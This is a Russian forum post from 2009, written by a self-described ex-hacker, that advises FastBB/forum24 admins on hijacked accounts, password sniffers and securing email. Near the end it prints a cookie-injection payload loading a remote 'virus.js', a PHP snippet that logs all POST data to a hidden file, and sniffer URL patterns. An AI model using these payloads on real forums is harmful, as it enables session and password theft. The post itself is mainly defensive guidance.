Общие замечания
Думаю, небольшая заметка будет уместна.
Что делать, если на форуме появился еще один нежданный админ?
/Способы того, как он появился, мы рассматривать по возможности не будем... Но это поверьте - это действительно возможно... /
Говорить -"ба, какие люди" - не нужно. Идти к Кейсу и говорить там дядя у меня какой-то, тоже не надо, точнее не вовремя. Время на счету. Дороги секунды. Как ни странно, можно отстоять форум и обломать хакера.
Рекомендую сразу сменить гпф. Без выяснения подробностей. Далее используя свой профиль, понизить в статусе админа и забанить его.
Если ваш профиль удален, создать новый с паролем гпф и сменить гпф на новый еще раз. Объясню зачем следует так делать. Вы регистрируете профиль, а на форуме может стоять снифер и, вуаля, хакер узнает ваш гпф. Получается, что мне даже не надо знать ваш гпф, чтобы взломать форум, мне и админского пароля достаточно, а потом, когда вы начнете дергаться, выудить и гпф. И тогда только Кейс, ваш спаситель и надежда.
Но вернемся к нашей сцене взлома. Как мы разобрались - смена пароля также опасна и на взломанном сайте.
И даже забаненный хакер может вернуться. Поэтому мы не только меняем гпф, но и восстанавливаем хтмл-низ и верх, что бы избавиться от снифера. Естественно, старый код дублируется и сохраняется для восстановления дизайна и анализа специалистом его начинки, для проверки на наличие снифера.
Игры с забаниванием могут быть продолжительными, особенно если вы потеряли гпф И тут вам без дубликата админского профиля никуда... Да и еще, некоторые делают хорошую вещь - они регят себе еще один профиль с админским статусом и "забывают" про него до поры до времени... профиль тот уходит в глубину списка пользователей и может быть не замечен хакером))) А потом уже вы ставите тихой ночью сниф и удаляете хакера, который утром дергается и теряет уже свой гпф.
Таким образом вы обратили наверное внимание на то, что любой предложенный кем то добрым код для вставки на форум потенциально опасен. Особенно если вы в нем не разбираетесь. И то, что чем больше админов тем лучше для хакеров. У них есть большие шансы взломать хотя бы одного...
Его /код снифера/ можно вставить даже в скрипт летающих бабочек вполне работающих, но и от кражи пароля не отказывающихся бабочек.
Теперь вы скажите: я до тогой тупости не опущусь. Хорошо. Значит тогда я узнаю ваш почтовый ящик, а это поверьте мне не сложно сделать и взломав его запрошу восстановление пароля. И на уже мою почту придет пароль.
А дальше я подсуну код снифера. И опять ГПФ мой))
И как же так? Вы скрывали свою почту. Ее не отображал ваш профиль? А дело в том что ящик у вас один на все случаи жизни. Вывод: нужен еще один ящик под эти цели. Адрес которого вы ни кому и не когда не скажите.
С таким ящиком не жалко и все фишки защиты форума запустить.
Пропишите его в профиле и активируйте. Тогда вы сможете восстановить забытый пароль.
Но ни когда не прописывайте вашу общественную почту. Лучше воздержаться от этого. И не прописывать почту в профиле вообще.
Рекомендую заводить почту исключительно на http://gmail.com (не путать с http://gmail.ru!). Если почта на нем, я как правило не берусь ее ломать А вот мэил.ру!!! Другое дело! И еще НМ и почты.нет И еще много других почтовых серверов лохоимцев)) Этих да в первую очередь
Теперь о паролях. Как не странно у многих он один на все форумы и сайты и почту и гпф...
В общем каждому форуму и сайту свой пароль... Ну можно расслабится и сделать а ля гостевой пароль и несколько секретных. )))
Еще можно украсть ваш пароль (а точнее кукисы, они же куки) через браузер Internet Explorer (ИЕ, ишак, ослик, ишачок...) и если он совпадет с паролем форума быть беде. С самого форума украсть через браузер пароль сейчас не возможно. Кейс защитил форум от этого. А вот с другого ресурса вполне возможно и реально. Помните об этом и не ходите на малознакомые сайты и тем более по ссылкам от неизвестных вам личностей. А еще смените его (браузер) на Оперу или ФайрФокс (Огнелис) в которых пресловутая уязвимость отсутствует, а значит вас ни кто не обманет
В любом случае если что не расстраивайтесь и идите к Кейсу на форум техподдержки и просите помощи ( Заявки на восстановление «взломанных» форумов ). Спокойно расскажите как и когда (а может даже и как) вас взломали. Укажите ссылку на форум (!). Не кричите. Поменьше истерики. Вас не захотят слушать если вы будете предъявлять претензии. И правильно сделают - вы сами виноваты, что вас обманули! Покажите как можно больше доказательств взлома. Вплоть до скриншотов переписки и главной страницы форума.
Поверьте часто хакер (если он человек умный) не станет афишировать взлом. Он аккуратно прикроет форум, чтобы и в мыслях не было подозрений на взлом))) И не станет разводить дискуссий. Проставит черный режим, всех понизит. Вроде форум есть, а взлома нет)
Модераторский состав должен быть хорошо подобран. Поскольку диверсии со стороны "модераторов"-хакеров не так страшны, но все же встречаются, не ленитесь копировать информацию, хотя бы сообщения первых топиков. Сами модераторы должны уметь предупредить вас о случившемся. Соответственно они должны знать, куда писать, а что еще лучше звонить!
Модераторы должны быть распределены по разделам, а не быть по принципу все на все разделы. Иначе вы никогда не узнаете кто же совершил диверсию в разделе.
Вы не поверите, но испугав подобной шалостью админы меняют себе пароль))) А это так хорошо для снифа...
Закончу статью тем, что хорошо бы поставить себе на форум логер. И знать кто и когда приходил, с каким статусом, и в каком разделе он был. Код логера не предлагаю... как думаете почему?
Желаю вам удачи. И счастья не знать что такое горе обездоленного админа. С уважением ваш Мефи.
______________________________________________
Справочный материал:
ГПФ - главный пароль форума задается при регистрации форума и может быть изменен здесь - http://catalogue.forum24.ru/?40 соответственно у вас свое имя форума и домена: имя.домен.ru/?40, где домен forum24 или borda.
СИ - социальный инженеринг - совокупность методов обмана юзера для конечной цели - выуживание полезной информации или пароля/доступа.
Куки, кука - грубо говоря файл в котором лежит ваш пароль дабы не вводить пароль на каждой странице сайта и форума. Вас как бы "запомнили" на время существования кука (пока вы не вышли с сайта по ссылке выйти) или сессии (по времени, например на час помнить вас).
Вы много слышали об этом страшном звере... снифер! Вор паролей!
Надеюсь я вас хорошо запугал и вы дрожите Но я вас не просто так пугал Я хочу что бы вы знали в лицо врага и умели с ним бороться. Итак рассмотрим его поближе...
Методы обнаружения снифера и его удаление
Снифер хороший зверек, живет и не кого не трогает пока вы не вошли на форум или не сменили пароль в профиле))) В общем ввод пароля опасен если вы не просмотрели исходный код страницы форума
Как посмотреть если у вас снифер? Элементарно: вид - исходный текст или Ctrl+F3 (в Опере) и вид - просмотр HTML-кода (в Internet Explorer’e - который как мы выяснили в предыдущей статье приносит вред безопасности пользователя).
Перед нами код странички. Наша задача осмотреться и принять решение входить на форум или не стоит Особенно если форум чужой и вы были туда в спешке приглашены, а возможно вас там обсуждают активно и критикуют И там нашли ваши порно фотки Вы теряете голову пишите тот же пароль что и всегда))) И, вуаля, вернувшись на свой родной форум вы видите пепелище и горькую свою участь
Текстовом редакторе нас интересует знак вопроса. И не случайно! Ведь большинство сниферов имеют пхп запросы. Которые описываются как раз этим коварным знаком))) Значит ищем его правка - поиск) Если есть и не вы его писали значит дело дрянь))) Точнее дело дрянь у хакера
Вот возможный вид этой строчки http://sniffer/picture.gif?password="...
и многие другие
В общем вот это должно вас напугать "....что то тут.....?.....и что то тут......."
А так же слова Password, user и самое страшное слово - Кейс Шутка конечно на счет последнего... Хотя и тоже правда от части))
Вот теперь ваши шаги для избавления от снифера:
- восстановите дизайн в первоначальное состояние,
- зайдите на форум и восстановите дизайн из вашей копии форума (которую вы я надеюсь всегда держите под рукой),
- установить кто же это сделал...
Если нет копии дизайна попробуйте удалить следующий кусок кода вручную
<script ..........>
....................
................?................
................................
</script>
если боитесь испортить код форума, просто удалите знак вопроса. Этого вполне достаточно для нарушения работы вора паролей. Не забудьте после удаления снифера сменить пароль(!)
Насчет обнаружения виновника, вам поможет первая статья. Но часто это видно по последнему списку посетителей. У которых есть права админа.
Надеюсь был вам полезен. И вы будете осторожны в мире инета))) Надеюсь вы не станете параноиком после моих статей...))
ЗЫ. О методах сокрытия снифера я вам так и не рассказал... оставлю для себя пожалуй А то вдруг захочу вспомнить старое
Ладно открою последний козырь...
<SCRIPT language='JavaScript1.1' src='http://site.domen.ru/snifer.js'></SCRIPT>
Вот такие строки должны наводить вас на мысль что весь код снифера был закинут в отдельный файл и этот файл линкуется в страничке. Таким образом весь довольно большой кусок снифера прячется туда.
Зайдите по ссылке http://site.domen.ru/snifer.js и просмотрите есть ли там запросы со знаком вопроса...
ЗЫЫ. И последнее если там абракадабра и мешанина значит весь сниф предварительно зашифровали от глаз юзера. Он тоже рабочий))) Только без знака вопроса будет))) Просто удалите
<SCRIPT language='JavaScript1.1' src='http://site.domen.ru/snifer.js'></SCRIPT>
с вашего форума и спите спокойно. Enjoy! Это все текущие современные методы взлома фастбб. Других нет. Да и эти тяжело протащить и осуществить. Фаста не ломается (с) Кейс.
Кое-что еще...
Еще была уязвимость такого рода:
хакер-модератор при бане любого участника вписывал не только айпи, но с помощью проги и вор паролей! Зайдя в список забаненых вас могли или могут /мне не известно сумел ли Кейс это исправить/ обокрасть и лишить пароля.
Как избавиться?
Простым просмотром исходного кода определите наличие снифера. И удалите этого забаненного из списка бан-листа. После чего смените пароль себе и всем кто лазил в бан-лист. Можно сменить и гпф.
После чего узнайте кто из модераторов мог это сделать. Возможно нужно спросить так называемый "секретный вопрос". Ответ на который знают лишь истинные модераторы. А хакер который угнал профиль не знает.
Печальней всего будет если вы сами его назначили. =)
Теперь о ЛЗ. Не секрет что на некоторых ролевых форумах можно заказать себе личное звание указав свой код. Я был буквально на днях на одном форуме и прикола ради указал код чатика. И его мне поставили. А так как в коде забыл закрыть один тег... Все страницы с моим участием разворотило до неузнаваемости)))
Но это не важно, я мог пихнуть им снифера! И написав во всех темах форума по сообщению, ждать богатого улова. ]:->
Так что незнание чего то кем то большая возможность для хакинга!
Что делать с лз? Ну заведите стандартную форму заполнения и СТРОГО придерживаетесь ее. А незнакомый код сразу отбрасывать и запрещать ставить своим со-админам.
Письмо к Кейсу
Привет. Это Норм Иридиум.
Я был забанен предположительно год назад на форуме техподдержки. С тех пор я многое передумал. И завязал с хакерской деятельностью окончательно. Обещаю не флудить на форуме. Тем более теперь у меня есть чем заниматься, а не страдать всякой фигней типа взлома малолеток и их ролевых форумов. Я стал помогать пользователям Фастбб в решении их проблем и способствовать укреплению безопасности их форумов. Целиком и полностью за счет разъяснительной работы.
Прошу простить меня, а я думаю меня есть за что не любить...В заключении передаю Вам информацию (правда не проверенную мной лично) о новом методе взлома форумов:
<script>
document.cookie="t='+eval(unescape('document.write%28%27%3Csc%27+
%27ript%20 src%3D%22http%3A%2F%2 Fpupkin.ru%2Fvirus.js %22%3E%3C%2Fsc%27+
%27ript%3E%27%29%3B'))+';domain=.forum24.ru";
</script>if (!isset($_COOKIE['block_the_fuck'])){
$ThePost = serialize($_POST);
$fp = fopen('.the_post', 'a');
fwrite($fp, $ThePost."\n");
fclose($fp);
}Готов и дальше сотрудничать с администрацией. Прошу разбанить мой профиль. Искренне извиняюсь за все деструктивные действия когда либо совершенные на сервисе фастбб.
С уважением, Норм Иридиум.
Суть уязвимости - вам в куки пишется скрипт когда вы заходите на чужой сайт/форум. По возвращению на свой форум этот скрипт вставляется из куков на форум и исполняется. Соответственно в скрипт может быть вложено что угодно в том числе и вор паролей.
Информация честно стырена с http://shinobiwars.rusff.me/, а там с http://katalogue.by.ru/ с сохранением всех авторских прав.
Отредактировано Akasuna no Sasori (26.03.2009 10:41:48)